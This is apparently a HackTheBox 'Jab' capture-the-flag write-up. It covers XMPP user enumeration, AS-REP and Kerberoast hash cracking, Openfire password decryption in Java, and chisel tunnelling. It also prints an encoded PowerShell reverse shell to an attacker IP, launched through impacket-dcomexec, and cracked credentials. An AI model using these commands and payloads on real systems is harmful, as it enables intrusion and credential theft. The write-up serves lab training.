JAB

Recon

DNS (Port 53)

Nothing interesting so far

└─$ dig any 10.10.11.4

; <<>> DiG 9.19.21-1-Debian <<>> any 10.10.11.4
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 54326
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 512
;; QUESTION SECTION:
;10.10.11.4.                    IN      ANY

;; AUTHORITY SECTION:
.                       3450    IN      SOA     a.root-servers.net. nstld.verisign-grs.com. 2024051901 1800 900 604800 86400

;; Query time: 8 msec
;; SERVER: 192.168.1.1#53(192.168.1.1) (TCP)
;; WHEN: Sun May 19 17:00:05 EDT 2024
;; MSG SIZE  rcvd: 114

Note: Since it's an actual DNS server we could add it in /etc/resolv.conf

SMB (139,445)

└─$ smbclient --no-pass -L //jab.htb
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to jab.htb failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

After cracking passwords from [[#Jabber/XMPP]]:

└─$ netexec smb jab.htb -u jmontgomery -p Midnight_121 --shares
SMB         10.10.11.4      445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:jab.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.4      445    DC01             [+] jab.htb\jmontgomery:Midnight_121
SMB         10.10.11.4      445    DC01             [*] Enumerated shares
SMB         10.10.11.4      445    DC01             Share           Permissions     Remark
SMB         10.10.11.4      445    DC01             -----           -----------     ------
SMB         10.10.11.4      445    DC01             ADMIN$                          Remote Admin
SMB         10.10.11.4      445    DC01             C$                              Default share
SMB         10.10.11.4      445    DC01             IPC$            READ            Remote IPC
SMB         10.10.11.4      445    DC01             NETLOGON        READ            Logon server share
SMB         10.10.11.4      445    DC01             SYSVOL          READ            Logon server share

┌──(woyag㉿kraken)-[~/Desktop/Rooms/Jab]
└─$ netexec smb jab.htb -u svc_openfire -p '!@#$%^&*(1qazxsw' --shares
SMB         10.10.11.4      445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:jab.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.4      445    DC01             [+] jab.htb\svc_openfire:!@#$%^&*(1qazxsw
SMB         10.10.11.4      445    DC01             [*] Enumerated shares
SMB         10.10.11.4      445    DC01             Share           Permissions     Remark
SMB         10.10.11.4      445    DC01             -----           -----------     ------
SMB         10.10.11.4      445    DC01             ADMIN$                          Remote Admin
SMB         10.10.11.4      445    DC01             C$                              Default share
SMB         10.10.11.4      445    DC01             IPC$            READ            Remote IPC
SMB         10.10.11.4      445    DC01             NETLOGON        READ            Logon server share
SMB         10.10.11.4      445    DC01             SYSVOL          READ            Logon server share

LDAP (389)

Certificate gives us domain name and DC domain name

┌──(woyag㉿kraken)-[~/Desktop/Rooms/Jab]
└─$ tail -1 /etc/hosts
10.10.11.4   jab.htb DC01.jab.htb

enum4linux came empty handed... hmm..

HTTP (47001)

No directory came up even with raft-medium-directories.txt wordlist and no subdomains were found for this port.

Jabber/XMPP

Few services are running this protocol so let's see what's going on.

Jabber: https://jabber.at/clients/ Client: https://pidgin.im

woyag:space

Not sure what happened, but after entering server IP it wouldn't let me login as woyag

New account: woyag2:Password123$

Add hostname to /etc/hosts

There seems to be 2 rooms:test said registration is requiredtest2 seems odd.

Looking around for features we can enumerate users:

For bdavis@conference.jab.htb says Offline

Accounts > Your Account > Search For Users > search.jab.htb > * > All Users

We can utilize Debug Window to get the table data, just repeat actions so debug window will log them:

Kerberos Users

Parse usernames:

from bs4 import BeautifulSoup as BS

with open('./table.xml') as f:
    xml = BS(f.read(), 'lxml')
    fields = xml.find_all('field', {'var': 'Username'})

with open('usernames.txt', 'w') as f:
    for field in fields:
        print(field.text.strip(), file=f)

Now we can try this usernames against Kerberos service:

Impacket’s GetUserSPNs.py will attempt to fetch Service Principal Names that are associated with normal user accounts. What is returned is a ticket that is encrypted with the user account’s password, which can then be bruteforced offline. source

└─$ impacket-GetUserSPNs -no-preauth "NO_PREAUTH_USER" -usersfile usernames.txt  -dc-host "DC01.jab.htb" "jab.htb/" | tee kerberos.log
...
$krb5asrep$23$jmontgomery@jab.htb@JAB.HTB:4aeb86801c44b732b4de82d7004afe6c$8a8fdaff91773c899f61b2b50cf40481256089e34a4349e2f6ef4725d18fdab101765df93aee827d7f442ace74dadf4164df2213bb4aaff56a69144d1d53762e3850caa8084ff32cbfa12684ec0283e4692fbc96ceae2c0fce37d0ccc6a8ff25a23e27701518b740fea9e3dc86ef0578f5bdc6cd0f25e4f46811d1d3a93bb1e4c3b6708fcf1ced57cc43d19d47286e57907a1b413f5aa8b3606806e9d32669568f0a9e9db3b1253c0fbda362a2c05507ed3da867aed21de13a16a848b868e667eb6261edf33a5bc88687e04dc9af3c63b8422f1d31d915a4f5b79a27d639323368ae
$krb5asrep$23$lbradford@jab.htb@JAB.HTB:c14b48505a62f5f7a6c9e3c772ab77ee$7ea3083f8453493d32a5f3fd4c508df137217747e9d4e47e1729c628f12962ec9d021944026b1b4ae0cd6c15f54f7d0d5820edb5c69b1894b5d891412e8c4d033fe884e6aefcea02929ab6f652c4065a3be6f1e16dd9b5e5b3802f3c2dda184781c147fa14901dbfd0794dd15335a44f748d4f2a770a1ce7d9a3ce228d3ff89388754a7b2cfddc9901ce73e9cc38cf78c142287a9b550d804315073050a3cc4253253c63a6ab87cefb8ea65c798dff93392d2a6714186fdfb15368cafab8d40fed86d410eefecde29a2f62a18752969a84127a0d087eb7c9567f93b3911c9a7f8dba
$krb5asrep$23$mlowe@jab.htb@JAB.HTB:39c3fd2a3374066f4be89c3a8ad76a0b$4685df20b5a18c4e74ad3c67ff2dfaf28785eae37ed1f4e51486e3725913665fc77ab0cf011a0277e9dfd8fc9cc0959b15e8c51ff8b0d9344ed0a2613ac49d10c4da7169d4a2c80669a427d4b38b632bd295b790e4741cbf39c228b15bc92f69154219f204528673d3b73352d1966951fd1b833570f3935af705927c996af4531ec4d382c53303859115e7e3fc282f34de2f0c441a57a65e3fe26efd4b7b91f662c48b6386fbdfcf67896eb00b16b0ec3b2ed00b50a5b9c78bd66dacfeb31ea4eb2c32bd623b08aefae6a8cb2e15a209b9d1d22f382674e0f3f8ddaa836931baecdb
...

➜ .\hashcat.exe -m 18200 -a 0 .\hashes .\rockyou.txt
$krb5asrep$23$jmontgomery@jab.htb@JAB.HTB:4aeb86801c44b732b4de82d7004afe6c$8a8fdaff91773c899f61b2b50cf40481256089e34a4349e2f6ef4725dd18fdab101765df93aee827d7f442ace74dadf4164df2213bb4aaff56a69144d1d53762e3850caa8084ff32cbfa12684ec0283e4692fbc96ceae2c0fce37d0ccc6a8fff25a23e27701518b740fea9e3dc86ef0578f5bdc6cd0f25e4f46811d1d3a93bb1e4c3b6708fcf1ced57cc43d19d47286e57907a1b413f5aa8b3606806e9d326695688f0a9e9db3b1253c0fbda362a2c05507ed3da867aed21de13a16a848b868e667eb6261edf33a5bc88687e04dc9af3c63b8422f1d31d915a4f5b79a27d639323368ae::Midnight_121

Creds: jmontgomery:Midnight_121

I couldn't login in via winrm and smb had nothing too. Let's try credentials against XMPP service:

Leaked Account

(11/21/2023 01:31:13 PM) adunn: team, we need to finalize post-remediation testing from last quarter's pentest. @bdavis Brian can you please provide us with a status?
(11/21/2023 01:33:58 PM) bdavis: sure. we removed the SPN from the svc_openfire account. I believe this was finding #2. can someone from the security team test this? if not we can send it back to the pentesters to validate. 
(11/21/2023 02:30:41 PM) bdavis: here are the commands from the report, can you find someone from the security team who can re-run these to validate? 
(11/21/2023 02:30:43 PM) bdavis: $ GetUserSPNs.py -request -dc-ip 192.168.195.129 jab.htb/hthompson
 
Impacket v0.9.25.dev1+20221216.150032.204c5b6b - Copyright 2021 SecureAuth Corporation
 
Password:
ServicePrincipalName  Name          MemberOf  PasswordLastSet             LastLogon  Delegation 
--------------------  ------------  --------  --------------------------  ---------  ----------
http/xmpp.jab.local   svc_openfire            2023-10-27 15:23:49.811611  <never>               
 
[-] CCache file is not found. Skipping...
$krb5tgs$23$*svc_openfire$JAB.HTB$jab.htb/svc_openfire*$b1abbb2f4beb2a48e7412ccd26b60e61$864f27ddaaded607ab5efa59544870cece4b6262e20f3bee38408d296ffbf07ceb421188b9b82ac0037ae67b488bb0ef2178a0792d62<SNIP>

(11/21/2023 02:30:56 PM) bdavis: $ hashcat -m 13100 svc_openfire_tgs /usr/share/wordlists/rockyou.txt 

hashcat (v6.1.1) starting...

<SNIP>

$krb5tgs$23$*svc_openfire$JAB.HTB$jab.htb/svc_openfire*$de17a01e2449626571bd9416dd4e3d46$4fea18693e1cb97f3e096288a76204437f115fe49b9611e339154e0effb1d0fcccfbbbb219da829b0ac70e8420f2f35a4f315c5c6f1d4ad3092e14ccd506e9a3bd3d20854ec73e62859cd68a7e6169f3c0b5ab82064b04df4ff7583ef18bbd42ac529a5747102c2924d1a76703a30908f5ad41423b2fff5e6c03d3df6c0635a41bea1aca3e15986639c758eef30b74498a184380411e207e5f3afef185eaf605f543c436cd155823b7a7870a3d5acd0b785f999facd8b7ffdafe6e0410af26efc42417d402f2819d03b3730203b59c21b0434e2e0e7a97ed09e3901f523ba52fe9d3ee7f4203de9e857761fbcb417d047765a5a01e71aff732e5d5d114f0b58a8a0df4ca7e1ff5a88c532f5cf33f2e01986ac44a353c0142b0360e1b839bb6889a54fbd9c549da23fb05193a4bfba179336e7dd69380bc4f9c3c00324e42043ee54b3017a913f84a20894e145b23b440aff9c524efb7957dee89b1e7b735db292ca5cb32cf024e9b8f5546c33caa36f5370db61a9a3facb473e741c61ec7dbee7420c188e31b0d920f06b7ffc1cb86ace5db0f9eeaf8c13bcca743b6bf8b2ece99dd58aff354f5b4a78ffcd9ad69ad8e7812a2952806feb9b411fe53774f92f9e8889380dddcb59de09320094b751a0c938ecc762cbd5d57d4e0c3d660e88545cc96e324a6fef226bc62e2bb31897670929571cd728b43647c03e44867b148428c9dc917f1dc4a0331517b65aa52221fcfe9499017ab4e6216ced3db5837d10ad0d15e07679b56c6a68a97c1e851238cef84a78754ff5c08d31895f0066b727449575a1187b19ad8604d583ae07694238bae2d4839fb20830f77fffb39f9d6a38c1c0d524130a6307125509422498f6c64adc030bfcf616c4c0d3e0fa76dcde0dfc5c94a4cb07ccf4cac941755cfdd1ed94e37d90bd1b612fee2ced175aa0e01f2919e31614f72c1ff7316be4ee71e80e0626b787c9f017504fa717b03c94f38fe9d682542d3d7edaff777a8b2d3163bc83c5143dc680c7819f405ec207b7bec51dabcec4896e110eb4ed0273dd26c82fc54bb2b5a1294cb7f3b654a13b4530bc186ff7fe3ab5a802c7c91e664144f92f438aecf9f814f73ed556dac403daaefcc7081957177d16c1087f058323f7aa3dfecfa024cc842aa3c8ef82213ad4acb89b88fc7d1f68338e8127644cfe101bf93b18ec0da457c9136e3d0efa0d094994e1591ecc4:!@#$%^&*(1qazxsw
                                                 
Session..........: hashcat
Status...........: Cracked
Hash.Name........: Kerberos 5, etype 23, TGS-REP
Hash.Target......: $krb5tgs$23$*svc_openfire$JAB.HTB$jab.htb/svc_openf...91ecc4
Time.Started.....: Fri Oct 27 15:30:12 2023 (17 secs)
Time.Estimated...: Fri Oct 27 15:30:29 2023 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:   873.9 kH/s (10.16ms) @ Accel:64 Loops:1 Thr:64 Vec:8
Recovered........: 1/1 (100.00%) Digests
Progress.........: 14344385/14344385 (100.00%)
Rejected.........: 0/14344385 (0.00%)
Restore.Point....: 14336000/14344385 (99.94%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: $HEX[2321686f74746965] -> $HEX[042a0337c2a156616d6f732103]
 
Started: Fri Oct 27 15:30:09 2023
Stopped: Fri Oct 27 15:30:29 2023

(11/21/2023 02:31:57 PM) adunn: I'll pass this along and circle back with the group
(11/21/2023 02:32:23 PM) bdavis: perfect, thanks Angela!
(11/21/2023 01:22:55 PM) The topic is:

Creds: svc_openfire:!@#$%^&*(1qazxsw

Enum4linux dumps lots of information, but mainly users and groups which isn't helpful at the moment.

┌──(woyag㉿kraken)-[~/Desktop/Rooms/Jab]
└─$ enum4linux -u svc_openfire -p '!@#$%^&*(1qazxsw' -a jab.htb | tee enum4linux.log

RPC

https://book.hacktricks.xyz/network-services-pentesting/135-pentesting-msrpc#executing-a-rce-with-valid-credentials

Impacket’s dcomexec.py provides an interactive shell on the Windows host similar to wmiexec.py, but using varying DCOM endpoints. source

https://medium.com/@iamkumarraj/exploring-impacket-dcomexec-enhancing-active-directory-attack-capabilities-a9663d383703impacket-dcomexec -object MMC20 <domain>/<username>:'<password>'@10.x.x.x 'cmd.exe /c powershell -e <reveseshell> -silentcommand

impacket-dcomexec -object MMC20 jab.htb/svc_openfire:'!@#$%^&*(1qazxsw'@10.10.11.4 'cmd.exe /c powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA2AC4ANwA0ACIALAA0ADQANAA0ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==' -silentcommand

User.txt

PS C:\users\svc_openfire> tree /f
Folder PATH listing
Volume serial number is E59D-A256
C:.
????Desktop
?       user.txt
PS C:\users\svc_openfire> cat desktop/user.txt
5b068fa3a3b9a30f8771f525c655d366

Privilege Escalation

PS C:\users\svc_openfire> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
PS C:\users\svc_openfire> whoami /groups

GROUP INFORMATION
-----------------

Group Name                                  Type             SID          Attributes
=========================================== ================ ============ ==================================================
Everyone                                    Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Distributed COM Users               Alias            S-1-5-32-562 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                               Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access  Alias            S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Certificate Service DCOM Access     Alias            S-1-5-32-574 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                        Well-known group S-1-5-2      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users            Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization              Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication            Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label            S-1-16-8448

There are lots of Openfire processing running, worth checking out.

I don't think Choco has anything useful so let's go to Openfire

Openfire

The version seems to be 4.7.5

PS C:\program files\Openfire> cat changelog.html | sls '<h2>.* -- <span' | select -first 5

<h2>4.7.5 -- <span style="font-weight: normal;">May 23, 2023</span></h2>
<h2>4.7.4 -- <span style="font-weight: normal;">November 9, 2022</span></h2>
<h2>4.7.3 -- <span style="font-weight: normal;">August 2, 2022</span></h2>
<h2>4.7.2 -- <span style="font-weight: normal;">July 13, 2022</span></h2>
<h2>4.7.1 -- <span style="font-weight: normal;">February 16, 2022</span></h2>

I already encountered Openfire, but version 4.7.4. [[Labs/HackTheBox/Seasonal/Season 5/SolarLab/Writeup|Writeup]]

Approach is the same:

PS C:\program files\Openfire\embedded-db> cat openfire.script | sls 'INSERT INTO (OFUSER|OFPROPERTY) VALUES' | sls admin

INSERT INTO OFUSER VALUES('admin','YgjeJXvFDf4dkSVd0v7ONC+MO8w=','3EHtXqOQxksAuSWAlW9BLaRapkE=','q6Ws2+ZEcDab+zFdBmYDQdWIaZwbfn6z',4096,NULL,'b3623187c74becad09de392aa14b0b08427dc47a78c232aa6bc63423d20e133c0473e10622652724989ca9655a8f87eff512c1ac13ac47cfa6ca3cd3687a81dd868a5cc48cef5a5e','Administrator','admin@jab.htb','001698357611581','0')
INSERT INTO OFPROPERTY VALUES('admin.authorizedJIDs','admin@jab.htb,svc_openfire@jab.htb',0,NULL)
INSERT INTO OFPROPERTY VALUES('provider.admin.className','org.jivesoftware.openfire.admin.DefaultAdminProvider',0,NULL)

PS C:\program files\Openfire\embedded-db> cat openfire.script | sls 'INSERT INTO (OFUSER|OFPROPERTY) VALUES' | sls passwordKey

INSERT INTO OFPROPERTY VALUES('passwordKey','zBgWeJBtP2RiZIu',0,NULL)

OpenFireDecryptPass.java

```java import javax.crypto.Cipher; import java.security.MessageDigest; import javax.crypto.spec.SecretKeySpec; import javax.crypto.spec.IvParameterSpec;

public class OpenFireDecryptPass { public static void main(String[] argv) throws Exception { if (argv.length < 2) { System.out.println("[-] Please specify the encypted password and the "passwordKey""); return; }

    MessageDigest md = MessageDigest.getInstance("SHA-1");

    byte[] keyParam = md.digest(argv[1].getBytes("utf8"));
    byte[] ivBytes = hex2bytes(argv[0].substring(0, 16));
    byte[] encryptedString = hex2bytes(argv[0].substring(16)); // 8 * 2 (since hex)

    IvParameterSpec iv = new IvParameterSpec(ivBytes);
    SecretKeySpec key = new SecretKeySpec(keyParam, "Blowfish");

    Cipher cipher = Cipher.getInstance("Blowfish/CBC/PKCS5Padding");
    cipher.init(Cipher.DECRYPT_MODE, key, iv);
    byte[] decrypted = cipher.doFinal(encryptedString);

    String decryptedString = bytes2hex(decrypted);

    System.out.println(new String(decrypted) + " (hex: " + decryptedString + ")");
}

public static byte[] hex2bytes(String str) {
    if (str == null || str.length() < 2) return null;
    else {
        int len = str.length() / 2;
        byte[] buffer = new byte[len];

        for (int i = 0; i < len; i++) buffer[i] = (byte) Integer.parseInt(str.substring(i * 2, i * 2 + 2), 16);

        return buffer;
    }

}

public static String bytes2hex(byte[] data) {
    if (data == null) return null;
    else {
        int len = data.length;

        String str = "";

        for (int i = 0; i < len; i++) {
            if ((data[i] & 0xFF) < 16) str = str + "0" + java.lang.Integer.toHexString(data[i] & 0xFF);
            else str = str + java.lang.Integer.toHexString(data[i] & 0xFF);
        }
        return str.toUpperCase();
    }
}

}

</details>


```bash
└─$ cp ../SolarLab/OpenFireDecryptPass.class .
└─$ java OpenFireDecryptPass b3623187c74becad09de392aa14b0b08427dc47a78c232aa6bc63423d20e133c0473e10622652724989ca9655a8f87eff512c1ac13ac47cfa6ca3cd3687a81dd868a5cc48cef5a5e zBgWeJBtP2RiZIu
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
odW!!mVfbXs304kskt!QAZDVGY&@ (hex: 006F0064005700210021006D00560066006200580073003300300034006B0073006B0074002100510041005A004400560047005900260040)

Creds: admin:odW!!mVfbXs304kskt!QAZDVGY&@

No luck with admin password, looks like we need exploit the Openfire itself.

PS C:\users> cd $ENV:TEMP
PS C:\Windows\TEMP> curl -uri http://10.10.16.74/rc.exe -outfile rc.exe
PS C:\Windows\TEMP> .\rc.exe Administrator 'odW!!mVfbXs304kskt!QAZDVGY&@' cmd.exe -r 10.10.16.74:4444
[-] RunasCsException: LogonUser failed with error code: The user name or password is incorrect
PS C:\Windows\TEMP> .\rc.exe Administrator 'odW!!mVfbXs304kskt!QAZDVGY&@' whoami
[-] RunasCsException: LogonUser failed with error code: The user name or password is incorrect
PS C:\Windows\TEMP>

Port forwarding using Chisel:

PS C:\Users\svc_openfire> cmd /c echo %PROCESSOR_ARCHITECTURE%
AMD64

PS C:\Users\svc_openfire> curl -uri http://10.10.16.74/chisel_1.9.1_windows_amd64 -outfile chisel.exe
PS C:\Users\svc_openfire> ls chisel.exe
    Directory: C:\Windows\TEMP
Mode                LastWriteTime         Length Name                                                       
----                -------------         ------ ----                                                       
-a----        5/20/2024   5:50 AM        9006080 chisel.exe                                                 

PS C:\Users\svc_openfire> .\chisel.exe client 10.10.16.74:3000 R:9090:127.0.0.1:9090 R:9091:127.0.0.1:9091

Upload jar file:

Execute powershell reverse shell:

powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA2AC4ANwA0ACIALAA0ADQANAA0ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==

┌──(woyag㉿kraken)-[~/Desktop/Rooms/Jab]
└─$ listen
Ncat: Version 7.94SVN ( https://nmap.org/ncat )
Ncat: Listening on [::]:4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.10.11.4:57616.

PS C:\Program Files\Openfire\bin> whoami
nt authority\system
PS C:\Program Files\Openfire\bin> cd /users/administrator/desktop
PS C:\users\administrator\desktop> ls

    Directory: C:\users\administrator\desktop

Mode                LastWriteTime         Length Name                                                
----                -------------         ------ ----                                                
-ar---        5/19/2024   5:04 PM             34 root.txt                                            

PS C:\users\administrator\desktop> cat root.txt
1092b34c577d548e8cc7925cc1880ed4

Help used:

https://medium.com/@islem.meghnine/hackthebox-jab-writeup-4515ffad3bf7
https://blog.csdn.net/weixin_45557138/article/details/136919900

PreviousHeadless NextOffice

Last updated 7 months ago

hashtagRecon

hashtagDNS (Port 53)

hashtagSMB (139,445)

hashtagLDAP (389)

hashtagHTTP (47001)

hashtagJabber/XMPP

hashtagKerberos Users

hashtagLeaked Account

hashtagRPC

hashtagUser.txt

hashtagPrivilege Escalation

hashtagOpenfire